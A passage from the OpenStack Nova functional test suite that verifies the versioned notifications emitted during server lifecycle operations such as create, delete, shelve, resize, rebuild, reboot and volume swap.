"nova_object.version": "1.0",
"nova_object.data": {
"mac": "fa:16:3e:4c:2c:30",
"address": "192.168.1.3",
"port_uuid": "ce531f90-199f-48c0-816c-13e38010b442",
"meta": {},
"version": 4,
"label": "private",
"device_name": "tapce531f90-19"
}}]
},
# block_device_mapping -> spawning
{'state_update.new_task_state': 'spawning',
'state_update.old_task_state': 'block_device_mapping',
'task_state': 'spawning',
},
# spawning -> active
{'state_update.new_task_state': None,
'state_update.old_task_state': 'spawning',
'state_update.state': 'active',
'launched_at': '2012-10-29T13:42:11Z',
'state': 'active',
'task_state': None,
'power_state': 'running'},
# tag added
{'state_update.old_task_state': None,
'state_update.old_state': 'active',
'tags': ['tag1']},
]
replacements = self._verify_instance_update_steps(
create_steps, instance_updates)
self.notifier.reset()
self._delete_server(server)
instance_updates = self._get_notifications('instance.update')
self.assertEqual(2, len(instance_updates),
self.notifier.versioned_notifications)
delete_steps = [
# active -> deleting
{'state_update.new_task_state': 'deleting',
'state_update.old_task_state': 'deleting',
'state_update.old_state': 'active',
'state': 'active',
'task_state': 'deleting',
'tags': ["tag1"],
'block_devices': [{
"nova_object.data": {
"boot_index": None,
"delete_on_termination": False,
"device_name": "/dev/sdb",
"tag": None,
"volume_id": "a07f71dc-8151-4e7d-a0cc-cd24a3f11113"
},
"nova_object.name": "BlockDevicePayload",
"nova_object.namespace": "nova",
"nova_object.version": "1.0"
}]
},
# deleting -> deleted
{'state_update.new_task_state': None,
'state_update.old_task_state': 'deleting',
'state_update.old_state': 'active',
'state_update.state': 'deleted',
'state': 'deleted',
'task_state': None,
'terminated_at': '2012-10-29T13:42:11Z',
'ip_addresses': [],
'power_state': 'pending',
'tags': ["tag1"],
'block_devices': [{
"nova_object.data": {
"boot_index": None,
"delete_on_termination": False,
"device_name": "/dev/sdb",
"tag": None,
"volume_id": "a07f71dc-8151-4e7d-a0cc-cd24a3f11113"
},
"nova_object.name": "BlockDevicePayload",
"nova_object.namespace": "nova",
"nova_object.version": "1.0"
}]
},
]
self._verify_instance_update_steps(delete_steps, instance_updates,
initial=replacements)
def _test_power_off_on_server(self, server):
self.api.post_server_action(server['id'], {'os-stop': {}})
self._wait_for_state_change(server, expected_status='SHUTOFF')
self.api.post_server_action(server['id'], {'os-start': {}})
self._wait_for_state_change(server, expected_status='ACTIVE')
self.assertEqual(4, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-power_off-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-power_off-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
self._verify_notification(
'instance-power_on-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[2])
self._verify_notification(
'instance-power_on-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[3])
def _test_shelve_and_shelve_offload_server(self, server):
self.flags(shelved_offload_time=-1)
self.api.post_server_action(server['id'], {'shelve': {}})
self._wait_for_state_change(server, expected_status='SHELVED')
self.assertEqual(3, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-shelve-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
self._verify_notification(
'instance-shelve-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[2])
self.notifier.reset()
self.api.post_server_action(server['id'], {'shelveOffload': {}})
# we need to wait for the instance.host to become None as well before
# we can unshelve to make sure that the unshelve.start notification
# payload is stable as the compute manager first sets the instance
# state then a bit later sets the instance.host to None.
self._wait_for_server_parameter(server,
{'status': 'SHELVED_OFFLOADED',
'OS-EXT-SRV-ATTR:host': None})
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-shelve_offload-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-shelve_offload-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
self.api.post_server_action(server['id'], {'unshelve': None})
self._wait_for_state_change(server, 'ACTIVE')
self._wait_for_notification('instance.unshelve.end')
def _test_unshelve_server(self, server):
# setting the shelved_offload_time to 0 should set the
# instance status to 'SHELVED_OFFLOADED'
        self.flags(shelved_offload_time=0)
self.api.post_server_action(server['id'], {'shelve': {}})
# we need to wait for the instance.host to become None as well before
# we can unshelve to make sure that the unshelve.start notification
# payload is stable as the compute manager first sets the instance
# state then a bit later sets the instance.host to None.
self._wait_for_server_parameter(server,
{'status': 'SHELVED_OFFLOADED',
'OS-EXT-SRV-ATTR:host': None})
post = {'unshelve': None}
self.api.post_server_action(server['id'], post)
self._wait_for_state_change(server, 'ACTIVE')
self._wait_for_notification('instance.unshelve.end')
self.assertEqual(9, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-unshelve-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[7])
self._verify_notification(
'instance-unshelve-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[8])
def _test_suspend_resume_server(self, server):
post = {'suspend': {}}
self.api.post_server_action(server['id'], post)
self._wait_for_state_change(server, 'SUSPENDED')
post = {'resume': None}
self.api.post_server_action(server['id'], post)
self._wait_for_state_change(server, 'ACTIVE')
# Four versioned notification are generated.
# 0. instance-suspend-start
# 1. instance-suspend-end
# 2. instance-resume-start
# 3. instance-resume-end
self.assertEqual(4, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-suspend-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-suspend-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
self._verify_notification(
'instance-resume-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[2])
self._verify_notification(
'instance-resume-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[3])
self.flags(reclaim_instance_interval=0)
def _test_pause_unpause_server(self, server):
self.api.post_server_action(server['id'], {'pause': {}})
self._wait_for_state_change(server, 'PAUSED')
self.api.post_server_action(server['id'], {'unpause': {}})
self._wait_for_state_change(server, 'ACTIVE')
# Four versioned notifications are generated
# 0. instance-pause-start
# 1. instance-pause-end
# 2. instance-unpause-start
# 3. instance-unpause-end
self.assertEqual(4, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-pause-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-pause-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
self._verify_notification(
'instance-unpause-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[2])
self._verify_notification(
'instance-unpause-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[3])
def _build_destination_payload(self):
cell1 = self.cell_mappings.get('cell1')
return {
'nova_object.version': '1.0',
'nova_object.namespace': 'nova',
'nova_object.name': 'DestinationPayload',
'nova_object.data': {
'aggregates': None,
'cell': {
'nova_object.version': '2.0',
'nova_object.namespace': 'nova',
'nova_object.name': 'CellMappingPayload',
'nova_object.data': {
'disabled': False,
'name': u'cell1',
'uuid': cell1.uuid
}
}
}
}
def _test_resize_and_revert_server(self, server):
self.flags(allow_resize_to_same_host=True)
other_flavor_body = {
'flavor': {
'name': 'other_flavor',
'ram': 256,
'vcpus': 1,
'disk': 1,
'id': 'd5a8bb54-365a-45ae-abdb-38d249df7845'
}
}
other_flavor_id = self.api.post_flavor(other_flavor_body)['id']
extra_specs = {
"extra_specs": {
"hw:watchdog_action": "reset"}}
self.admin_api.post_extra_spec(other_flavor_id, extra_specs)
# Ignore the create flavor notification
self.notifier.reset()
post = {
'resize': {
'flavorRef': other_flavor_id
}
}
self.api.post_server_action(server['id'], post)
self._wait_for_state_change(server, 'VERIFY_RESIZE')
self._pop_and_verify_dest_select_notification(server['id'],
replacements={
'ignore_hosts': [],
'flavor.memory_mb': other_flavor_body['flavor']['ram'],
'flavor.name': other_flavor_body['flavor']['name'],
'flavor.flavorid': other_flavor_id,
'flavor.extra_specs': extra_specs['extra_specs'],
'requested_destination': self._build_destination_payload()})
self.assertEqual(7, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
# ignore instance.exists
self.notifier.versioned_notifications.pop(0)
# This list needs to be in order.
expected_notifications = [
'instance-resize_prep-start',
'instance-resize_prep-end',
'instance-resize-start',
'instance-resize-end',
'instance-resize_finish-start',
'instance-resize_finish-end'
]
for idx, notification in enumerate(expected_notifications):
self._verify_notification(
notification,
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[idx])
self.notifier.reset()
# the following is the revert server request
post = {'revertResize': None}
self.api.post_server_action(server['id'], post)
self._wait_for_state_change(server, 'ACTIVE')
self.assertEqual(3, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
# ignore instance.exists
self.notifier.versioned_notifications.pop(0)
self._verify_notification(
'instance-resize_revert-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-resize_revert-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
@mock.patch('nova.compute.manager.ComputeManager._prep_resize')
def test_resize_server_error_but_reschedule_was_success(
self, mock_prep_resize):
"""Test it, when the prep_resize method raise an exception,
but the reschedule_resize_or_reraise was successful and
scheduled the resize. In this case we get a notification
about the exception, which caused the prep_resize error.
"""
def _build_resources(*args, **kwargs):
raise exception.FlavorDiskTooSmall()
server = self._boot_a_server(
extra_params={'networks': [{'port': self.neutron.port_1['id']}]})
self.flags(allow_resize_to_same_host=True)
other_flavor_body = {
'flavor': {
'name': 'other_flavor_error',
'ram': 512,
'vcpus': 1,
'disk': 1,
'id': 'a22d5517-147c-4147-a0d1-e698df5cd4e9'
}
}
other_flavor_id = self.api.post_flavor(other_flavor_body)['id']
post = {
'resize': {
'flavorRef': other_flavor_id
}
}
self.notifier.reset()
mock_prep_resize.side_effect = _build_resources
# NOTE(gibi): the first resize_instance call (from the API) should be
# unaffected so that we can reach _prep_resize at all. But the
# subsequent resize_instance call (from _reschedule_resize_or_reraise)
# needs to be mocked as there is no alternative host to resize to.
patcher = mock.patch.object(self.compute.manager.compute_task_api,
'resize_instance')
self.addCleanup(patcher.stop)
patcher.start()
self.api.post_server_action(server['id'], post)
self._wait_for_notification('instance.resize.error')
self._pop_and_verify_dest_select_notification(server['id'],
replacements={
'ignore_hosts': [],
'flavor.name': other_flavor_body['flavor']['name'],
'flavor.flavorid': other_flavor_id,
'flavor.extra_specs': {},
'requested_destination': self._build_destination_payload()})
# 0: instance-exists
# 1: instance-resize_prep-start
# 2: instance-resize-error
# 3: instance-resize_prep-end
self.assertLessEqual(2, len(self.notifier.versioned_notifications),
'Unexpected number of notifications: %s' %
self.notifier.versioned_notifications)
# Note(gibi): There is also an instance.exists notification emitted
# during the rescheduling
tb = self.notifier.versioned_notifications[2]['payload'][
'nova_object.data']['fault']['nova_object.data']['traceback']
self.assertIn("raise exception.FlavorDiskTooSmall()", tb)
self._verify_notification('instance-resize-error',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id'],
'fault.traceback': self.ANY
},
actual=self.notifier.versioned_notifications[2])
@mock.patch('nova.compute.manager.ComputeManager._prep_resize')
def test_resize_server_error_and_reschedule_was_failed(
self, mock_prep_resize):
"""Test it, when the prep_resize method raise an exception,
after trying again with the reschedule_resize_or_reraise method
call, but the rescheduled also was unsuccessful. In this
case called the exception block.
In the exception block send a notification about error.
At end called raising an exception based on *exc_info,
which not send another error.
"""
def _build_resources(*args, **kwargs):
raise exception.FlavorDiskTooSmall()
server = self._boot_a_server(
extra_params={'networks': [{'port': self.neutron.port_1['id']}]})
self.flags(allow_resize_to_same_host=True)
other_flavor_body = {
'flavor': {
'name': 'other_flavor_error',
'ram': 512,
'vcpus': 1,
'disk': 1,
'id': 'a22d5517-147c-4147-a0d1-e698df5cd4e9'
}
}
other_flavor_id = self.api.post_flavor(other_flavor_body)['id']
post = {
'resize': {
'flavorRef': other_flavor_id
}
}
self.notifier.reset()
mock_prep_resize.side_effect = _build_resources
# NOTE(gibi): the first resize_instance call (from the API) should be
# unaffected so that we can reach _prep_resize at all. But the
# subsequent resize_instance call (from _reschedule_resize_or_reraise)
# needs to fail. It isn't realistic that resize_instance would raise
# FlavorDiskTooSmall, but it's needed for the notification sample
# to work.
patcher = mock.patch.object(self.compute.manager.compute_task_api,
'resize_instance',
side_effect=_build_resources)
self.addCleanup(patcher.stop)
patcher.start()
self.api.post_server_action(server['id'], post)
self._wait_for_state_change(server, expected_status='ERROR')
self._wait_for_notification('compute.exception')
# There should be the following notifications after scheduler's
# select_destination notifications:
# 0: instance-exists
# 1: instance-resize_prep-start
# 2: instance-resize-error
# 3: instance-resize_prep-end
# 4: compute.exception
# (via the wrap_exception decorator on
# the ComputeManager.prep_resize method.)
self._pop_and_verify_dest_select_notification(server['id'],
replacements={
'ignore_hosts': [],
'flavor.name': other_flavor_body['flavor']['name'],
'flavor.flavorid': other_flavor_id,
'flavor.extra_specs': {},
'requested_destination': self._build_destination_payload()})
self.assertEqual(5, len(self.notifier.versioned_notifications),
'Unexpected number of notifications: %s' %
self.notifier.versioned_notifications)
tb = self.notifier.versioned_notifications[2]['payload'][
'nova_object.data']['fault']['nova_object.data']['traceback']
self.assertIn("raise exception.FlavorDiskTooSmall()", tb)
self._verify_notification('instance-resize-error',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id'],
'fault.traceback': self.ANY
},
actual=self.notifier.versioned_notifications[2])
def _test_snapshot_server(self, server):
post = {'createImage': {'name': 'test-snap'}}
response = self.api.post_server_action(server['id'], post)
self._wait_for_notification('instance.snapshot.end')
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-snapshot-start',
replacements={
'snapshot_image_id': response['image_id'],
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-snapshot-end',
replacements={
'snapshot_image_id': response['image_id'],
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
def test_rebuild_server(self):
# NOTE(gabor_antal): Rebuild changes the image used by the instance,
        # therefore the actions tested in test_instance_action had to be in
        # a specific order. To avoid this problem, rebuild was moved from
# test_instance_action to its own method.
server = self._boot_a_server(
extra_params={'networks': [{'port': self.neutron.port_1['id']}]})
self._attach_volume_to_server(server, self.cinder.SWAP_OLD_VOL)
self.notifier.reset()
image_ref = 'a2459075-d96c-40d5-893e-577ff92e721c'
post = {
'rebuild': {
'imageRef': image_ref,
'metadata': {}
}
}
self.api.post_server_action(server['id'], post)
        # Before going back to ACTIVE state the
        # server state needs to be changed to REBUILD state
self._wait_for_state_change(server, expected_status='REBUILD')
self._wait_for_state_change(server, expected_status='ACTIVE')
self._pop_and_verify_dest_select_notification(server['id'],
replacements={
'image.container_format': 'ami',
'image.disk_format': 'ami',
'image.id': image_ref,
'image.properties': {
'nova_object.data': {},
'nova_object.name': 'ImageMetaPropsPayload',
'nova_object.namespace': 'nova',
'nova_object.version': '1.12',
},
'image.size': 58145823,
'image.tags': [],
'scheduler_hints': {'_nova_check_type': ['rebuild']},
'force_hosts': 'compute',
'force_nodes': 'fake-mini',
'requested_destination': self._build_destination_payload()})
# 0. instance.rebuild_scheduled
# 1. instance.exists
# 2. instance.rebuild.start
# 3. instance.detach.start
# 4. instance.detach.end
# 5. instance.rebuild.end
# The compute/manager will detach every volume during rebuild
self.assertEqual(6, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-rebuild_scheduled',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id'],
'trusted_image_certificates': None},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-rebuild-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id'],
'trusted_image_certificates': None},
actual=self.notifier.versioned_notifications[2])
self._verify_notification(
'instance-volume_detach-start',
replacements={
'reservation_id': server['reservation_id'],
'task_state': 'rebuilding',
'architecture': None,
'image_uuid': 'a2459075-d96c-40d5-893e-577ff92e721c',
'uuid': server['id']},
actual=self.notifier.versioned_notifications[3])
self._verify_notification(
'instance-volume_detach-end',
replacements={
'reservation_id': server['reservation_id'],
'task_state': 'rebuilding',
'architecture': None,
'image_uuid': 'a2459075-d96c-40d5-893e-577ff92e721c',
'uuid': server['id']},
actual=self.notifier.versioned_notifications[4])
self._verify_notification(
'instance-rebuild-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id'],
'trusted_image_certificates': None},
actual=self.notifier.versioned_notifications[5])
def test_rebuild_server_with_trusted_cert(self):
# NOTE(gabor_antal): Rebuild changes the image used by the instance,
        # therefore the actions tested in test_instance_action had to be in
        # a specific order. To avoid this problem, rebuild was moved from
# test_instance_action to its own method.
create_trusted_certs = ['cert-id-1', 'cert-id-2']
server = self._boot_a_server(
extra_params={'networks': [{'port': self.neutron.port_1['id']}],
'trusted_image_certificates': create_trusted_certs})
self._attach_volume_to_server(server, self.cinder.SWAP_OLD_VOL)
self.notifier.reset()
image_ref = 'a2459075-d96c-40d5-893e-577ff92e721c'
rebuild_trusted_certs = ['rebuild-cert-id-1', 'rebuild-cert-id-2']
post = {
'rebuild': {
'imageRef': image_ref,
'metadata': {},
'trusted_image_certificates': rebuild_trusted_certs,
}
}
self.api.post_server_action(server['id'], post)
        # Before going back to ACTIVE state the
        # server state needs to be changed to REBUILD state
self._wait_for_state_change(server, expected_status='REBUILD')
self._wait_for_state_change(server, expected_status='ACTIVE')
self._pop_and_verify_dest_select_notification(server['id'],
replacements={
'image.container_format': 'ami',
'image.disk_format': 'ami',
'image.id': image_ref,
'image.properties': {
'nova_object.data': {},
'nova_object.name': 'ImageMetaPropsPayload',
'nova_object.namespace': 'nova',
'nova_object.version': '1.12',
},
'image.size': 58145823,
'image.tags': [],
'scheduler_hints': {'_nova_check_type': ['rebuild']},
'force_hosts': 'compute',
'force_nodes': 'fake-mini',
'requested_destination': self._build_destination_payload()})
# 0. instance.rebuild_scheduled
# 1. instance.exists
# 2. instance.rebuild.start
# 3. instance.detach.start
# 4. instance.detach.end
# 5. instance.rebuild.end
# The compute/manager will detach every volume during rebuild
self.assertEqual(6, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-rebuild_scheduled',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-rebuild-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[2])
self._verify_notification(
'instance-volume_detach-start',
replacements={
'reservation_id': server['reservation_id'],
'task_state': 'rebuilding',
'architecture': None,
'image_uuid': 'a2459075-d96c-40d5-893e-577ff92e721c',
'uuid': server['id']},
actual=self.notifier.versioned_notifications[3])
self._verify_notification(
'instance-volume_detach-end',
replacements={
'reservation_id': server['reservation_id'],
'task_state': 'rebuilding',
'architecture': None,
'image_uuid': 'a2459075-d96c-40d5-893e-577ff92e721c',
'uuid': server['id']},
actual=self.notifier.versioned_notifications[4])
self._verify_notification(
'instance-rebuild-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[5])
@mock.patch('nova.compute.manager.ComputeManager.'
'_do_rebuild_instance_with_claim')
def test_rebuild_server_exc(self, mock_rebuild):
def _virtual_interface_create_failed(*args, **kwargs):
# A real error that could come out of driver.spawn() during rebuild
raise exception.VirtualInterfaceCreateException()
server = self._boot_a_server(
extra_params={'networks': [{'port': self.neutron.port_1['id']}]})
self._attach_volume_to_server(server, self.cinder.SWAP_OLD_VOL)
self.notifier.reset()
post = {
'rebuild': {
'imageRef': 'a2459075-d96c-40d5-893e-577ff92e721c',
'metadata': {}
}
}
self.api.post_server_action(server['id'], post)
mock_rebuild.side_effect = _virtual_interface_create_failed
self._wait_for_state_change(server, expected_status='ERROR')
notification = self._get_notifications('instance.rebuild.error')
self.assertEqual(1, len(notification),
self.notifier.versioned_notifications)
tb = notification[0]['payload']['nova_object.data']['fault'][
'nova_object.data']['traceback']
self.assertIn('raise exception.VirtualInterfaceCreateException()', tb)
self._verify_notification(
'instance-rebuild-error',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id'],
'trusted_image_certificates': None,
'fault.traceback': self.ANY},
actual=notification[0])
def _test_restore_server(self, server):
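# Soft delete the server, restore it, and assert the restore
# start/end notifications.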
self.flags(reclaim_instance_interval=30)
self.api.delete_server(server['id'])
self._wait_for_state_change(server, 'SOFT_DELETED')
# We don't want to test soft_delete here, so clear its notifications.
self.notifier.reset()
self.api.post_server_action(server['id'], {'restore': {}})
self._wait_for_state_change(server, 'ACTIVE')
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-restore-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-restore-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
def _test_reboot_server(self, server):
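# Hard reboot the server and assert the reboot start/end notifications.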
post = {'reboot': {'type': 'HARD'}}
self.api.post_server_action(server['id'], post)
self._wait_for_notification('instance.reboot.start')
self._wait_for_notification('instance.reboot.end')
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-reboot-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-reboot-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
@mock.patch('nova.virt.fake.SmallFakeDriver.reboot')
def _test_reboot_server_error(self, server, mock_reboot):
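# A hard reboot failing in the driver should emit reboot.start
# followed by reboot.error with the fault traceback.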
def _hard_reboot(*args, **kwargs):
raise exception.UnsupportedVirtType(virt="FakeVirt")
mock_reboot.side_effect = _hard_reboot
post = {'reboot': {'type': 'HARD'}}
self.api.post_server_action(server['id'], post)
self._wait_for_notification('instance.reboot.start')
self._wait_for_notification('instance.reboot.error')
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
tb = self.notifier.versioned_notifications[1]['payload'][
'nova_object.data']['fault']['nova_object.data']['traceback']
self.assertIn("raise exception.UnsupportedVirtType", tb)
self._verify_notification(
'instance-reboot-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-reboot-error',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id'],
'fault.traceback': self.ANY},
actual=self.notifier.versioned_notifications[1])
def _detach_volume_from_server(self, server, volume_id):
self.api.delete_server_volume(server['id'], volume_id)
self._wait_for_notification('instance.volume_detach.end')
def _volume_swap_server(self, server, attachment_id, volume_id):
self.api.put_server_volume(server['id'], attachment_id, volume_id)
def test_volume_swap_server(self):
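# Swap an attached volume and assert the volume_swap start/end
# notifications.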
server = self._boot_a_server(
extra_params={'networks':
[{'port': self.neutron.port_1['id']}]})
self._attach_volume_to_server(server, self.cinder.SWAP_OLD_VOL)
self.cinder.swap_volume_instance_uuid = server['id']
self._volume_swap_server(server, self.cinder.SWAP_OLD_VOL,
self.cinder.SWAP_NEW_VOL)
self._wait_until_swap_volume(server, self.cinder.SWAP_NEW_VOL)
# NOTE(gibi): the new volume id can appear on the API earlier than the
# volume_swap.end notification is emitted. So to make the test stable
# we have to wait for the volume_swap.end notification directly.
self._wait_for_notification('instance.volume_swap.end')
self.assertEqual(7, len(self.notifier.versioned_notifications),
'Unexpected number of versioned notifications. '
'Got: %s' % self.notifier.versioned_notifications)
self._verify_notification(
'instance-volume_swap-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[5])
self._verify_notification(
'instance-volume_swap-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[6])
def _do_setup_server_and_error_flag(self):
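# Boot a server, attach the error volume and configure the Cinder
# fixture to fail on the error attachment id.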
server = self._boot_a_server(
extra_params={'networks': [{'port': self.neutron.port_1['id']}]})
self._attach_volume_to_server(server, self.cinder.SWAP_ERR_OLD_VOL)
self.cinder.attachment_error_id = self.cinder.SWAP_ERR_ATTACH_ID
return server
def test_volume_swap_server_with_error(self):
server = self._do_setup_server_and_error_flag()
self._volume_swap_server(server, self.cinder.SWAP_ERR_OLD_VOL,
self.cinder.SWAP_ERR_NEW_VOL)
self._wait_for_notification('compute.exception')
# Eight versioned notifications are generated.
# 0. instance-create-start
# 1. instance-create-end
# 2. instance-update
# 3. instance-volume_attach-start
# 4. instance-volume_attach-end
# 5. instance-volume_swap-start
# 6. instance-volume_swap-error
# 7. compute.exception
self.assertLessEqual(7, len(self.notifier.versioned_notifications),
'Unexpected number of versioned notifications. '
'Got: %s' % self.notifier.versioned_notifications)
block_devices = [{
"nova_object.data": {
"boot_index": None,
"delete_on_termination": False,
"device_name": "/dev/sdb",
"tag": None,
"volume_id": self.cinder.SWAP_ERR_OLD_VOL
},
"nova_object.name": "BlockDevicePayload",
"nova_object.namespace": "nova",
"nova_object.version": "1.0"
}]
self._verify_notification(
'instance-volume_swap-start',
replacements={
'new_volume_id': self.cinder.SWAP_ERR_NEW_VOL,
'old_volume_id': self.cinder.SWAP_ERR_OLD_VOL,
'block_devices': block_devices,
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[5])
tb1 = self.notifier.versioned_notifications[6]['payload'][
'nova_object.data']['fault']['nova_object.data']['traceback']
self.assertIn("_swap_volume", tb1)
tb2 = self.notifier.versioned_notifications[7]['payload'][
'nova_object.data']['traceback']
self.assertIn("_swap_volume", tb2)
self._verify_notification(
'instance-volume_swap-error',
replacements={
'reservation_id': server['reservation_id'],
'block_devices': block_devices,
'uuid': server['id'],
'fault.traceback': self.ANY},
actual=self.notifier.versioned_notifications[6])
def test_resize_confirm_server(self):
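# Resize the server, then confirm the resize and assert the
# resize_confirm start/end notifications.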
server = self._boot_a_server(
extra_params={'networks': [{'port': self.neutron.port_1['id']}]})
self._attach_volume_to_server(server, self.cinder.SWAP_OLD_VOL)
self.admin_api.post_extra_spec(
'2', {"extra_specs": {"hw:watchdog_action": "disabled"}})
self.flags(allow_resize_to_same_host=True)
post = {'resize': {'flavorRef': '2'}}
self.api.post_server_action(server['id'], post)
self._wait_for_state_change(server, 'VERIFY_RESIZE')
self.notifier.reset()
post = {'confirmResize': None}
self.api.post_server_action(server['id'], post)
self._wait_for_state_change(server, 'ACTIVE')
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-resize_confirm-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-resize_confirm-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
def _test_trigger_crash_dump(self, server):
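# Trigger a crash dump and assert the trigger_crash_dump start/end
# notifications.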
post = {'trigger_crash_dump': None}
self.api.post_server_action(server['id'], post)
self._wait_for_notification('instance.trigger_crash_dump.end')
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-trigger_crash_dump-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-trigger_crash_dump-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
def _test_volume_detach_attach_server(self, server):
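# Detach then re-attach a volume and assert the corresponding
# start/end notifications.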
self._detach_volume_from_server(server, self.cinder.SWAP_OLD_VOL)
# 0. volume_detach-start
# 1. volume_detach-end
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-volume_detach-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-volume_detach-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
self.notifier.reset()
self._attach_volume_to_server(server, self.cinder.SWAP_OLD_VOL)
# 0. volume_attach-start
# 1. volume_attach-end
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-volume_attach-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-volume_attach-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
def _test_rescue_unrescue_server(self, server):
